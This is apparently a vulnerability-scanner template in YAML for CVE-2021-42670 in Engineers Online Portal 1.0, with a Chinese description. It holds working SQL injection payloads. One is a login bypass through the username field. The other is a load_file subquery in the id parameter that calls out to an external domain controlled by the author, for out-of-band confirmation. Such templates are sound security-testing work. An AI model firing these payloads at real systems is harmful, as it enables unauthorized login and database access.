id: CVE-2021-42670
info:
name: Engineers Online Portal 1.0 容易受到三种类型的SQL注入攻击
author: nu11secur1ty
severity: critical
description: Engineers Online Portal 1.0 应用程序中的 id 参数my_classmates.php似乎容易受到三种类型的 SQL 注入攻击,即基于布尔的盲注、基于错误的查询和 UNION 查询。payload '+(select load_file('\hh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net\ggc'))+' 在 id 参数中提交。此有效负载注入一个 SQL 子查询,该查询使用引用外部域上的 URL 的 UNC 文件路径调用 MySQL 的 load_file 函数。应用程序与该域交互,表明已执行注入的 SQL 查询。此外,用户登录容易受到参数“username”上的 SQL 注入绕过身份验证的攻击。
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/janobe/CVE-nu11-101321
set:
hosturl: request.url
rules:
r0:
request:
method: POST
path: /login.php
follow_redirects: true
headers:
Referer: "{{hosturl}}/nia_munoz_monitoring_system/index.php"
Cookie: PHPSESSID=p4s256t6kaorni5i3ifelrjnp7
body: |
username='+or+1%3D1%23&password=admin
expression: response.status == 200 && response.body.bcontains(b'true_student')
r1:
request:
method: GET
path: /my_classmates.php?id=1912'%2b(select%20load_file('%5c%5c%5c%5chh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net%5c%5cggc'))%2b'
follow_redirects: true
headers:
Referer: "{{hosturl}}/dashboard_student.php"
Cookie: PHPSESSID=p4s256t6kaorni5i3ifelrjnp7
expression: response.status == 200 && response.body.bcontains(b'hh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net')
expression: r0() && r1()